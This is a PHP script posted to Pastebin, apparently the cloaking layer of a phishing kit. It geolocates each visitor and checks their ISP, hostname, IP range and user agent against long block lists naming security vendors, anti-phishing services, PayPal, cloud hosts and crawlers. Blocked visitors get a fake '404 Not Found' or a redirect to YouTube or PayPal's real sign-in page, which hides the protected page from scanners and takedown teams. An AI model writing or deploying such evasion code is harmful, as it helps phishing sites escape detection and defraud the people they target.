Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- session_start();
- error_reporting(0);
- $config_antibot['apikey'] = 'e52955d406fcb6a4b0a9b9e9xxxxxxxxxxxxxxx'; //https://antibot.pw/dashboard/developers
- class Antibot
- {
- function apikey($api_key){
- $this->apikey = $api_key;
- }
- function get_client_ip() {
- $ipaddress = '';
- if (getenv('HTTP_CLIENT_IP')){
- $ipaddress = getenv('HTTP_CLIENT_IP');
- }
- if(getenv('HTTP_X_FORWARDED_FOR')){
- $ipaddress = getenv('HTTP_X_FORWARDED_FOR');
- }
- if(getenv('HTTP_X_FORWARDED')){
- $ipaddress = getenv('HTTP_X_FORWARDED');
- }
- if(getenv('HTTP_FORWARDED_FOR')){
- $ipaddress = getenv('HTTP_FORWARDED_FOR');
- }
- if(getenv('HTTP_FORWARDED')){
- $ipaddress = getenv('HTTP_FORWARDED');
- }
- if(getenv('REMOTE_ADDR')){
- $ipaddress = getenv('REMOTE_ADDR');
- }
- $ipaddress = explode(",", $ipaddress);
- if(preg_match("/::1|127.0.0.1/", $ipaddress[0])){
- $ipaddress[0] = '23.200.91.255';
- }
- return $ipaddress[0];
- }
- function httpGet($url){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_TIMEOUT, 30); //timeout in seconds
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
- $response = curl_exec($ch);
- return $response;
- }
- function check(){
- $ip = $this->get_client_ip();
- $respons = $this->httpGet("https://antibot.pw/api/v2-blockers?ip=".$ip."&apikey=".$this->apikey."&ua=".urlencode($_SERVER['HTTP_USER_AGENT']));
- $json = json_decode($respons,true);
- if($json['is_bot'] == 1 || $json['is_bot'] == true){
- return true;
- }else{
- return false;
- }
- }
- }
- if($_SESSION['check'] == false){
- $Antibot = new Antibot;
- $_SESSION['check'] = true;
- $Antibot->apikey( $config_antibot['apikey'] );
- if($Antibot->check() == true){
- $_SESSION['bot'] = true;
- header('HTTP/1.0 403 Forbidden');
- die("Maintance");
- }
- }
- if($_SESSION['bot'] == true ){
- header('HTTP/1.0 403 Forbidden');
- die("Maintance");
- }
- $ip = $_SERVER['REMOTE_ADDR'];
- $getip = 'https://extreme-ip-lookup.com/json/' . $ip;
- $curl = curl_init();
- curl_setopt($curl, CURLOPT_URL, $getip);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
- $content = curl_exec($curl);
- curl_close($curl);
- $details = json_decode($content);
- $nama_negara = $details->country;
- $banned_negara = array(
- 'Azerbaijan',
- 'Anonymous Proxy',
- 'Asia/Pacific Region',
- 'Europe',
- 'Afghanistan',
- 'Albania',
- 'Poland',
- 'United States',
- 'Switzerland',
- 'United Kingdom',
- 'Algeria',
- 'Andorra',
- 'China',
- 'Angola',
- 'Austria',
- 'Bahrain',
- 'Bangladesh',
- 'Barbados',
- 'Belarus',
- 'Belgium',
- 'Bulgaria',
- 'Belize',
- 'India',
- 'South Korea',
- 'Benin',
- 'Bhutan',
- 'Bolivia',
- 'Bosnia and Herzegovina',
- 'Botswana',
- 'Spain',
- 'Brazil',
- 'Brunei',
- 'Burkina Faso',
- 'Burma',
- 'Burundi',
- 'Cambodia',
- 'Cameroon',
- 'Cabo Verde',
- 'Central African Republic',
- 'Chad',
- 'Comoros',
- 'Congo, Democratic Republic of the',
- 'Congo, Republic of the',
- 'Croatia',
- 'Cuba',
- 'Curacao',
- 'Czechia',
- 'Denmark',
- 'Djibouti',
- 'East Timor',
- 'Timor-Leste',
- 'Egypt',
- 'Equatorial Guinea',
- 'Eritrea',
- 'Spain',
- 'Estonia',
- 'Ethiopia',
- 'France',
- 'Gabon',
- 'Gambia, The',
- 'Georgia',
- 'Germany',
- 'Ghana',
- 'Grenada',
- 'Guatemala',
- 'Guinea',
- 'Guinea-Bissau',
- 'Guyana',
- 'Haiti',
- 'Holy See',
- 'Iceland',
- 'Iran',
- 'Iraq',
- 'Italy',
- 'Jamaica',
- 'Jordan',
- 'Kazakhstan',
- 'Kenya',
- 'Kiribati',
- 'Korea, North',
- 'Kosovo',
- 'Kuwait',
- 'Kyrgyzstan',
- 'Laos',
- 'Latvia',
- 'Lebanon',
- 'Lesotho',
- 'Liberia',
- 'Libya',
- 'Liechtenstein',
- 'Lithuania',
- 'Luxembourg',
- 'Macau',
- 'Macedonia',
- 'Madagascar',
- 'Malawi',
- 'Maldives',
- 'Mali',
- 'Marshall Islands',
- 'Mauritania',
- 'Mauritius',
- 'Micronesia',
- 'Moldova',
- 'Monaco',
- 'Mongolia',
- 'Montenegro',
- 'Morocco',
- 'Mozambique',
- 'Namibia',
- 'Nauru',
- 'Nepal',
- 'Netherlands',
- 'Nicaragua',
- 'Niger',
- 'Nigeria',
- 'North Korea',
- 'Norway',
- 'Oman',
- 'Pakistan',
- 'Palau',
- 'Palestinian Territories',
- 'Papua New Guinea',
- 'Romania',
- 'Korea, Republic of',
- 'Russia',
- 'Rwanda',
- 'Saint Kitts and Nevis',
- 'Saint Lucia',
- 'Saint Vincent and the Grenadines',
- 'Samoa',
- 'San Marino',
- 'Sao Tome and Principe',
- 'Senegal',
- 'Serbia',
- 'Seychelles',
- 'Sierra Leone',
- 'Sint Maarten',
- 'Slovakia',
- 'Slovenia',
- 'Solomon Islands',
- 'Somalia',
- 'South Africa',
- 'South Sudan',
- 'Sri Lanka',
- 'Sudan',
- 'Suriname',
- 'Swaziland',
- 'Sweden',
- 'Syria',
- 'Tajikistan',
- 'Tanzania',
- 'Timor-Leste',
- 'Togo',
- 'Tonga',
- 'Trinidad and Tobago',
- 'Tunisia',
- 'Turkey',
- 'Turkmenistan',
- 'Tuvalu',
- 'Uganda',
- 'Ukraine',
- 'Uzbekistan',
- 'Vanuatu',
- 'Vietnam',
- 'Zambia',
- 'Zimbabwe'
- );
- foreach ($banned_negara as $ibanned_negara) {
- if (substr_count($nama_negara, $ibanned_negara) > 0) {
- header('LOCATION: https://www.youtube.com/watch?v=LUYdzQN6v38');
- die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
- }
- }
- $ip = $_SERVER['REMOTE_ADDR'];
- $getip = 'https://extreme-ip-lookup.com/json/' . $ip;
- $curl = curl_init();
- curl_setopt($curl, CURLOPT_URL, $getip);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
- $content = curl_exec($curl);
- curl_close($curl);
- $details = json_decode($content);
- $nama_negara = $details->country;
- $ispnya = $details->isp;
- $banned_isp = array(
- 'PEAK',
- 'Falco Networks B.V.',
- 'Fortinet Technologies',
- 'Namecheap Inc.',
- 'Kaspersky Lab AO',
- 'Confluence Networks Inc',
- 'Allstream Business US, LLC',
- 'Secure Computing Corp. . Fka',
- 'Tesonet UAB',
- 'Checs',
- 'McMaster University',
- 'Support Intelligence Inc',
- 'SingleHop LLC',
- 'SharkTech',
- 'Frantech Solutions',
- 'OVH Hosting Inc.',
- 'ServeTheWorld AS',
- 'CTCPL',
- 'TU Berlin Campus Network',
- 'Leaseweb USA, Inc.',
- 'DataCamp Limited',
- 'Emerald Onion',
- 'Hextet Systems',
- 'Linode LLC',
- 'North American Cable Television and Internet LLC',
- 'GZ Systems',
- 'NForce Entertainment B.V.',
- 'Private Layer Inc',
- 'M247 Ltd',
- 'Cloud Plus Pty Ltd',
- 'COLT Telecom-CUST',
- 'Amsterdam Residential Television and Internet LLC',
- 'Alentus Corporation',
- 'Telcoinabox',
- 'GigeNET',
- 'UnmeteredInternet.com',
- 'Estoxy OU',
- 'Amanah Tech Inc.',
- 'FixedRoute Ltd',
- 'Axtel, S.A.B. de C.V.',
- 'New Dream Network LLC',
- 'Vancouver Coastal Health',
- 'Handy Networks, LLC',
- 'Quonix Networks Inc.',
- 'Take 2 Hosting, Inc',
- 'EGIHosting',
- 'Google LLC',
- 'Meow Global Networks Inc.',
- 'Overkill Alpha s.r.o.',
- 'ForcePoint Cloud Ltd',
- 'TOT Public Company Limited',
- 'LG DACOM Corporation',
- 'ChinaNet',
- 'British Telecommunications PLC',
- 'Ipg',
- 'Level 3',
- 'Digiweb ltd',
- 'Uninet S.A. de C.V.',
- 'Eircom Limited',
- 'Corporacion Telemic C.A.',
- 'ShenZhen Sunrise Technology Co.,Ltd.',
- 'anyNode',
- 'www.amaze.com.au',
- 'iiNet Limited',
- 'Webroot Services Ltd',
- 'Verizon Business',
- 'Tencent Cloud Computing (Beijing) Co. Ltd',
- 'AMALYZE',
- 'DataCamp s.r.o.',
- 'PlusNet plc.',
- 'Privax Ltd',
- 'AVAST cloud',
- 'Web4Africa ZA',
- 'COMPLETEL SAS France',
- 'Amazon.com, Inc.',
- 'Akamai Technologies Inc.',
- 'Tzulo Inc.',
- 'Hetzner',
- 'Bitdefender SRL',
- 'GZ Systems Limited - Colocation in Seattle',
- 'Virginia Polytechnic Institute and State Univ.',
- 'ISH Tecnologia SA',
- 'GTT',
- 'NuNet Inc.',
- 'Prescient Software Inc.',
- 'Scrapinghub Ltd',
- 'CloudRoute LLC',
- 'Virtual Machine Solutions LLC',
- 'CloudVPN Inc.',
- 'GData',
- 'Barracuda Networks Inc.',
- 'Top Level Hosting SRL',
- 'LLC Globalnet',
- 'Gaditek Associates',
- 'PayPal Inc.',
- 'Microsoft Azure',
- 'Avast',
- 'AVG',
- 'Censys Inc.',
- 'ZoneAlarm',
- 'Viettel Group',
- 'Transtelco Inc',
- 'VeloCloud Networks Inc.',
- 'RapidDedi',
- 'Nodes Direct',
- 'Internet Security - VE',
- 'UNICOM Government Inc',
- 'Comodo Group Inc.',
- 'Secure Computing Corp',
- 'Chenhua Tech',
- 'factioninc.com',
- 'WranglerNet',
- 'Privactually Ltd',
- 'Bayer Business Services GmbH',
- 'DigitalOcean LLC',
- 'Secure Internet LLC',
- 'Universal College of Learning',
- 'Netmagic Datacenter',
- 'Vertical Telecoms Pty Ltd',
- 'Faction',
- 'OppoBox LLC',
- 'Venus Business Communications Limited',
- 'Zencurity ApS',
- 'ScanSafe Services LLC',
- 'YouTube LLC',
- 'HIVELOCITY, Inc.',
- 'Green House Data, Inc.',
- 'Cogent Communications',
- 'Tefincom S.a.',
- 'Gigared S.A.',
- 'Viasat Inc.',
- 'Randolph-Macon College',
- 'Lincoln Telephone',
- 'BlueLinx',
- 'Vultr Holdings LLC',
- 'Bilink LLC',
- 'ICS Advanced Technologies',
- 'Stofa A/S',
- 'Iliad',
- 'Hetzner Online AG',
- 'PPMAN Services Srl',
- 'central.biz.rr.com',
- 'LeaseWeb USA Inc.',
- 'Owned Networks',
- 'Affinity Internet Inc',
- 'ANS Communications Inc',
- 'ServerCrate',
- 'M247 Europe SRL',
- 'Pride Marketing',
- 'B2 Net Solutions',
- 'E.I. duPont de Nemours and Company',
- 'Northstar Technologies',
- 'Secure Computing Corp. ... fka',
- 'Peak 10',
- 'WestNet',
- 'Quasi Networks LTD',
- 'Iomart Hosting Limited',
- 'Virtela Technology Services Incorporated',
- 'Google',
- 'Rendering Partner',
- 'Hosting Services Inc.',
- 'WebsiteWelcome.com',
- 'PacketExchange',
- 'OpenDNS',
- 'VPN Consumer Network',
- 'Cap Gemini America',
- 'MasterCard Technologies LLC',
- 'EGI Internal',
- 'Freeport-McMoRan',
- 'Artel Software Corporation',
- 'InMotion Hosting Inc.',
- 'ViaSat',
- 'Praxair',
- 'Knology Inc.',
- 'Private Customer',
- 'Midcontinent Communications',
- 'Intel Corporation',
- 'Gvec.net',
- 'Bharti Airtel Limited',
- 'Ecsis.net',
- 'SurfControl',
- 'Blueriver Networking Services',
- 'Bjc Health System',
- 'Symantec Corporation',
- 'tw telecom holdings',
- 'Mysort.co.uk Limited',
- 'Interserver',
- 'Rackspace Inc',
- 'Cleveland Cloud',
- 'PSINet Inc.',
- 'Xhostserver',
- 'Cogecodata',
- 'JTGlobal',
- 'XMission, L.C.',
- 'Wintek',
- 'Wintek Corporation',
- 'SimpleLink LLC',
- 'LogicWeb',
- 'Santa Cruz Community Internet',
- 'GoDaddy.com, LLC',
- 'VBBCOM_Ltd',
- 'Server Plan S.r.l.',
- 'Google Fiber',
- 'United States Department of Justice',
- 'Hurricane Electric',
- 'DTE Energy Company',
- 'Microsoft Corporation',
- 'Florida High Speed Internet',
- 'Websense',
- 'PenTeleData',
- 'UUNET Technologies',
- 'Nortel Networks',
- 'Embarq Corporation',
- 'RCN Corporation',
- 'ViaWest Internet Services',
- 'Eli Lilly and Company',
- 'Syniverse Technologies, LLC',
- 'Bright House Networks',
- '5280 Enterprises LLC',
- 'Entergy Corporation',
- 'The Cosmopolitan of Las Vegas',
- 'Citrix VDC-HardwareLayer',
- 'MagneTek',
- 'ISP Alliance',
- 'Mediacom Communications Corp',
- 'Fairview Health Services',
- 'Colleges of the Fenway',
- 'Alcatel-Lucent Austria AG',
- 'Century21 Solutions',
- 'Linode',
- 'Hughes Network Systems',
- 'Insight Communications Company',
- 'Surfcontrol',
- 'Apple',
- 'Black Oak Computers Inc - WashingtonDC',
- 'B2B Wholesale Pty',
- 'Virtual Datacentre Pty',
- 'Advantage Computers',
- 'PIPEX-BLOCK1',
- 'EUKHOST Ltd',
- 'Amazon Technologies Inc.',
- 'Bank Of China(Hong Kong) Limited',
- 'Amazon.com',
- 'OVH Hosting',
- 'TalkTalk',
- 'IPVanish',
- 'Cisco Systems',
- 'Tehnologii Budushego LLC',
- 'Eonix Corporation',
- 'hosttech GmbH',
- 'Wowrack.com',
- 'biquity Server Solutions Los Angeles',
- 'SunGard Availability Services LP',
- 'Internap Network Services Corporation',
- 'Palo Alto Networks',
- 'PlusNet Technologies Ltd',
- 'Scaleway',
- 'Facebook',
- 'emeraldonion.org',
- 'Host1Plus',
- 'XO Communications',
- 'Nobis Technology Group',
- 'ExpressVPN',
- 'DME Hosting LLC',
- 'Prescient Software',
- 'Sungard Network Solutions',
- 'OVH SAS',
- 'Jigsaw Data Corporation',
- 'Iomart Hosting Ltd',
- 'Hosting Solution',
- 'Barracuda Networks',
- 'Solar VPS',
- 'PHPNET Hosting Services',
- 'DigitalOcean',
- 'Level 3 Communications',
- 'softlayer',
- 'SoftLayer Technologies',
- 'Complete Internet Access',
- 'london-tor.mooo.com',
- 'amazonaws',
- 'cyveillance',
- 'phishtank',
- 'tor.piratenpartei-nrw.de',
- 'cpanel66.proisp.no',
- 'tor-node.com',
- 'dreamhost',
- 'Involta',
- 'exit0.liskov.tor-relays.net',
- 'tor.tocici.com',
- 'tor.wazar.org',
- 'netpilot',
- 'calyxinstitute',
- 'tor-exit',
- 'msnbot',
- 'p3pwgdsn',
- 'netcraft',
- 'University of Virginia',
- 'trendmicro',
- 'ebay',
- 'paypal',
- 'torservers',
- 'comodo',
- 'ebbs.healingpathsolutions.com',
- 'healingpathsolutions.com',
- 'Solution Pro',
- 'Zayo Bandwidth',
- 'spider.clicktargetdevelopment.com',
- 'clicktargetdevelopment.com',
- 'static.spro.net',
- 'Digital Ocean',
- 'Blue Coat Systems',
- 'GANDI SAS',
- 'roamsite.com',
- 'Proofpoint, Inc.',
- 'ColoUp',
- 'Westnet',
- 'The University of Tokyo',
- 'University',
- 'University of',
- 'QuadraNet',
- 'exit-01a.noisetor.net',
- 'noisetor.net',
- 'noisetor',
- 'vultr.com',
- 'Zscaler',
- 'Choopa',
- 'RedSwitches Pty',
- 'Quintex Alliance Consulting',
- 'www16.mailshell.com',
- 'this.is.a.tor.exit-node.net',
- 'this.is.a.tor.node.xmission.com',
- 'colocrossing.com',
- 'DedFiberCo',
- 'crawl',
- 'sucuri.net',
- 'crawler',
- 'proxy',
- 'enom',
- 'CloudFlare',
- 'cloudflare',
- 'yahoo',
- 'trustwave',
- 'rima-tde.net',
- 'tfbnw.net',
- 'pacbell.net',
- 'tpnet.pl',
- 'ovh.net',
- 'centralnic',
- 'badware',
- 'phishing',
- 'antivirus',
- 'SiteAdvisor',
- 'McAfee',
- 'Bitdefender',
- 'avirasoft',
- 'phishtank.com',
- 'googleusercontent'
- );
- foreach ($banned_isp as $isps) {
- if (substr_count($ispnya, $isps) > 0) {
- header('LOCATION: https://www.youtube.com/watch?v=LUYdzQN6v38');
- die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
- }
- }
- if (!empty($_SERVER['HTTP_USER_AGENT']))
- {
- $userAgents = array(
- "Google",
- "Slurp",
- "MSNBot",
- "Mozilla/5.0 zgrab/0.x",
- "ia_archiver",
- "python-requests",
- "Wget/1.13.4 (linux-gnu)",
- "Apache-HttpClient/4.5.6 (Java/1.8.0_122-ea)",
- "Mozilla/4.0",
- "Yandex",
- "Rambler"
- );
- foreach($userAgents as $agent)
- if (strpos($_SERVER['HTTP_USER_AGENT'], $agent) !== false)
- {
- header('LOCATION: https://www.youtube.com/watch?v=LUYdzQN6v38');
- exit;
- }
- }
- $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
- $blocked_words = array(
- "above",
- "google",
- "softlayer",
- "amazonaws",
- "cyveillance",
- "phishtank",
- "dreamhost",
- "tor01.emeraldonion.org",
- "netpilot",
- "calyxinstitute",
- "tor-exit",
- "msnbot",
- "p3pwgdsn",
- "scan.automation.fraudwatchinternational.com",
- "torexit",
- "netcraft",
- "trendmicro",
- "ebay",
- "paypal",
- "torservers",
- "messagelabs",
- "sucuri.net",
- "crawler"
- );
- foreach ($blocked_words as $word) {
- if (substr_count($hostname, $word) > 0) {
- header('LOCATION: https://www.youtube.com/watch?v=LUYdzQN6v38');
- die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
- }
- }
- $bannedIP = array(
- '^104.236.153.*',
- '^107.170.*.*',
- '^109.186.*.*',
- '^12.148.196.*',
- '^12.148.209.*',
- '^128.242.*.*',
- '^131.212.*.*',
- '^149.20.*.*',
- '^158.108.*.*',
- '^163.195.178.*',
- '^167.24.*.*',
- '^168.188.*.*',
- '^173.194.*.*',
- '^173.224.160.*',
- '^173.224.161.*',
- '^173.224.162.*',
- '^173.224.163.*',
- '^173.224.164.*',
- '^173.224.165.*',
- '^173.224.166.*',
- '^173.224.167.*',
- '^184.173.*.*',
- '^192.115.134.*',
- '^192.118.48.*',
- '^193.220.178.*',
- '^193.253.199.*',
- '^193.47.80.*',
- '^194.52.68.*',
- '^194.72.238.*',
- '^194.90.*.*',
- '^198.25.*.*',
- '^198.54.*.*',
- '^199.30.228.*',
- '^202.108.252.*',
- '^204.14.48.*',
- '^206.28.72.*',
- '^207.126.144.*',
- '^208.65.144.*',
- '^208.91.115.*',
- '^60.226.182.*',
- '^209.73.228.*',
- '^209.85.*.*',
- '^209.85.128.*',
- '^212.143.*.*',
- '^212.150.*.*',
- '^212.235.*.*',
- '^212.29.192.*',
- '^212.29.224.*',
- '^212.50.193.*',
- '^216.10.193.*',
- '^216.239.32.*',
- '^216.252.167.*',
- '^217.132.*.*',
- '^38.100.*.*',
- '^38.105.*.*',
- '^38.144.36.*',
- '^46.116.*.* ',
- '^50.7.*.*',
- '^50.97.*.*',
- '^54.176.*.*',
- '^62.116.207.*',
- '^62.90.*.*',
- '^64.106.213.*',
- '^64.124.14.*',
- '^64.18.*.*',
- '^64.233.160.*',
- '^64.27.2.*',
- '^64.37.103.*',
- '^64.62.136.*',
- '^64.62.175.*',
- '^66.102.*.*',
- '^66.135.200.*',
- '^66.150.14.*',
- '^66.205.64.*',
- '^66.207.120.*',
- '^66.221.*.*',
- '^66.249.*.*',
- '^67.15.*.*',
- '^67.209.128.*',
- '^68.65.53.71',
- '^69.61.12.*',
- '^69.65.*.*',
- '^72.14.192.*',
- '^74.125.*.*',
- '^81.161.59.*',
- '^82.166.*.*',
- '^85.250.*.*',
- '^85.64.*.*',
- '^89.138.*.*',
- '^91.103.66.*',
- '^93.172.*.*',
- '^95.76.156.*'
- );
- if (in_array($_SERVER['REMOTE_ADDR'], $bannedIP)) {
- header('LOCATION: https://www.youtube.com/watch?v=LUYdzQN6v38');
- die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
- exit();
- } else {
- foreach ($bannedIP as $ip) {
- if (preg_match('/' . $ip . '/', $_SERVER['REMOTE_ADDR'])) {
- header('LOCATION: https://www.youtube.com/watch?v=LUYdzQN6v38');
- die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
- }
- }
- }
- if (preg_match('/legs\.com|bitly/si', $_SERVER["HTTP_USER_AGENT"])) {
- header('LOCATION: https://www.youtube.com/watch?v=LUYdzQN6v38');
- die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
- }
- if (preg_match('/67\.221\.235\.(.*?)|74\.3\.160\.(.*?)/', $_SERVER['REMOTE_ADDR'])) {
- header('LOCATION: https://www.youtube.com/watch?v=LUYdzQN6v38');
- die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
- }
- $Bot = array(
- "abot",
- "dbot",
- "ebot",
- "hbot",
- "kbot",
- "lbot",
- "mbot",
- "nbot",
- "obot",
- "pbot",
- "rbot",
- "sbot",
- "tbot",
- "vbot",
- "ybot",
- "zbot",
- "bot.",
- "bot/",
- "_bot",
- ".bot",
- "/bot",
- "-bot",
- ":bot",
- "(bot",
- "crawl",
- "slurp",
- "spider",
- "seek",
- "accoona",
- "acoon",
- "adressendeutschland",
- "ah-ha.com",
- "ahoy",
- "altavista",
- "ananzi",
- "anthill",
- "appie",
- "arachnophilia",
- "arale",
- "araneo",
- "aranha",
- "architext",
- "aretha",
- "arks",
- "asterias",
- "atlocal",
- "atn",
- "atomz",
- "augurfind",
- "backrub",
- "bannana_bot",
- "baypup",
- "bdfetch",
- "big brother",
- "biglotron",
- "bjaaland",
- "blackwidow",
- "blaiz",
- "blog",
- "blo.",
- "bloodhound",
- "boitho",
- "booch",
- "bradley",
- "butterfly",
- "calif",
- "cassandra",
- "ccubee",
- "cfetch",
- "charlotte",
- "churl",
- "cienciaficcion",
- "cmc",
- "collective",
- "comagent",
- "combine",
- "computingsite",
- "csci",
- "curl",
- "cusco",
- "daumoa",
- "deepindex",
- "delorie",
- "depspid",
- "deweb",
- "die blinde kuh",
- "digger",
- "ditto",
- "dmoz",
- "docomo",
- "download express",
- "dtaagent",
- "dwcp",
- "ebiness",
- "ebingbong",
- "e-collector",
- "ejupiter",
- "emacs-w3 search engine",
- "esther",
- "evliya celebi",
- "ezresult",
- "falcon",
- "felix ide",
- "ferret",
- "fetchrover",
- "fido",
- "findlinks",
- "fireball",
- "fish search",
- "fouineur",
- "funnelweb",
- "gazz",
- "gcreep",
- "genieknows",
- "getterroboplus",
- "geturl",
- "glx",
- "goforit",
- "golem",
- "grabber",
- "grapnel",
- "gralon",
- "griffon",
- "gromit",
- "grub",
- "gulliver",
- "hamahakki",
- "harvest",
- "havindex",
- "helix",
- "heritrix",
- "hku www octopus",
- "homerweb",
- "htdig",
- "html index",
- "html_analyzer",
- "htmlgobble",
- "hubater",
- "hyper-decontextualizer",
- "ia_archiver",
- "ibm_planetwide",
- "ichiro",
- "iconsurf",
- "iltrovatore",
- "image.kapsi.net",
- "imagelock",
- "incywincy",
- "indexer",
- "infobee",
- "informant",
- "ingrid",
- "inktomisearch.com",
- "inspector web",
- "intelliagent",
- "internet shinchakubin",
- "ip3000",
- "iron33",
- "israeli-search",
- "ivia",
- "jack",
- "jakarta",
- "javabee",
- "jetbot",
- "jumpstation",
- "katipo",
- "kdd-explorer",
- "kilroy",
- "knowledge",
- "kototoi",
- "kretrieve",
- "labelgrabber",
- "lachesis",
- "larbin",
- "legs",
- "libwww",
- "linkalarm",
- "link validator",
- "linkscan",
- "lockon",
- "lwp",
- "lycos",
- "magpie",
- "mantraagent",
- "mapoftheinternet",
- "marvin/",
- "mattie",
- "mediafox",
- "mediapartners",
- "mercator",
- "merzscope",
- "microsoft url control",
- "minirank",
- "miva",
- "mj12",
- "mnogosearch",
- "moget",
- "monster",
- "moose",
- "motor",
- "multitext",
- "muncher",
- "muscatferret",
- "mwd.search",
- "myweb",
- "najdi",
- "nameprotect",
- "nationaldirectory",
- "nazilla",
- "ncsa beta",
- "nec-meshexplorer",
- "nederland.zoek",
- "netcarta webmap engine",
- "netmechanic",
- "netresearchserver",
- "netscoop",
- "newscan-online",
- "nhse",
- "nokia6682/",
- "nomad",
- "noyona",
- "nutch",
- "nzexplorer",
- "objectssearch",
- "occam",
- "omni",
- "open text",
- "openfind",
- "openintelligencedata",
- "orb search",
- "osis-project",
- "pack rat",
- "pageboy",
- "pagebull",
- "page_verifier",
- "panscient",
- "parasite",
- "partnersite",
- "patric",
- "pear.",
- "pegasus",
- "peregrinator",
- "pgp key agent",
- "phantom",
- "phpdig",
- "picosearch",
- "piltdownman",
- "pimptrain",
- "pinpoint",
- "pioneer",
- "piranha",
- "plumtreewebaccessor",
- "pogodak",
- "poirot",
- "pompos",
- "poppelsdorf",
- "poppi",
- "popular iconoclast",
- "psycheclone",
- "publisher",
- "python",
- "rambler",
- "raven search",
- "roach",
- "road runner",
- "roadhouse",
- "robbie",
- "robofox",
- "robozilla",
- "rules",
- "salty",
- "sbider",
- "scooter",
- "scoutjet",
- "scrubby",
- "search.",
- "searchprocess",
- "semanticdiscovery",
- "senrigan",
- "sg-scout",
- "shai'hulud",
- "shark",
- "shopwiki",
- "sidewinder",
- "sift",
- "silk",
- "simmany",
- "site searcher",
- "site valet",
- "sitetech-rover",
- "skymob.com",
- "sleek",
- "smartwit",
- "sna-",
- "snappy",
- "snooper",
- "sohu",
- "speedfind",
- "sphere",
- "sphider",
- "spinner",
- "spyder",
- "steeler/",
- "suke",
- "suntek",
- "supersnooper",
- "surfnomore",
- "sven",
- "sygol",
- "szukacz",
- "tach black widow",
- "tarantula",
- "templeton",
- "/teoma",
- "t-h-u-n-d-e-r-s-t-o-n-e",
- "theophrastus",
- "titan",
- "titin",
- "tkwww",
- "toutatis",
- "t-rex",
- "tutorgig",
- "twiceler",
- "twisted",
- "ucsd",
- "udmsearch",
- "url check",
- "updated",
- "vagabondo",
- "valkyrie",
- "verticrawl",
- "victoria",
- "vision-search",
- "volcano",
- "voyager/",
- "voyager-hc",
- "w3c_validator",
- "w3m2",
- "w3mir",
- "walker",
- "wallpaper",
- "wanderer",
- "wauuu",
- "wavefire",
- "web core",
- "web hopper",
- "web wombat",
- "webbandit",
- "webcatcher",
- "webcopy",
- "webfoot",
- "weblayers",
- "weblinker",
- "weblog monitor",
- "webmirror",
- "webmonkey",
- "webquest",
- "webreaper",
- "websitepulse",
- "websnarf",
- "webstolperer",
- "webvac",
- "webwalk",
- "webwatch",
- "webwombat",
- "webzinger",
- "wget",
- "whizbang",
- "whowhere",
- "wild ferret",
- "worldlight",
- "wwwc",
- "wwwster",
- "xenu",
- "xget",
- "xift",
- "xirq",
- "yandex",
- "yanga",
- "yeti",
- "yodao",
- "zao/",
- "zippp",
- "zyborg",
- 'Googlebot',
- 'Baiduspider',
- 'Pegaso PCS, S.A. de C.V.',
- 'ia_archiver',
- 'R6_FeedFetcher',
- 'NetcraftSurveyAgent',
- 'Sogou web spider',
- 'bingbot',
- 'Yahoo! Slurp',
- 'facebookexternalhit',
- 'PrintfulBot',
- 'msnbot',
- 'Twitterbot',
- 'UnwindFetchor',
- 'urlresolver',
- 'Butterfly',
- 'TweetmemeBot',
- 'PaperLiBot',
- 'MJ12bot',
- 'AhrefsBot',
- 'Exabot',
- 'Ezooms',
- 'YandexBot',
- 'SearchmetricsBot',
- 'picsearch',
- 'TweetedTimes Bot',
- 'QuerySeekerSpider',
- 'ShowyouBot',
- 'woriobot',
- 'merlinkbot',
- 'BazQuxBot',
- 'Kraken',
- 'SISTRIX Crawler',
- 'R6_CommentReader',
- 'magpie-crawler',
- 'GrapeshotCrawler',
- 'PercolateCrawler',
- 'MaxPointCrawler',
- 'NetSeer crawler',
- 'grokkit-crawler',
- 'SMXCrawler',
- 'PulseCrawler',
- 'Y!J-BRW',
- '80legs.com/webcrawler',
- 'Mediapartners-Google',
- 'Spinn3r',
- 'InAGist',
- 'Python-urllib',
- 'NING',
- 'TencentTraveler',
- 'Feedfetcher-Google',
- 'mon.itor.us',
- 'spbot',
- 'Feedly',
- 'bot',
- 'curl',
- "echo blinde kuh",
- "shaihulud",
- "zyborg"
- );
- foreach ($Bot as $BotType) {
- if (stripos($_SERVER['HTTP_USER_AGENT'], $BotType) !== false) {
- header('LOCATION: https://www.paypal.com/id/signin');
- die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement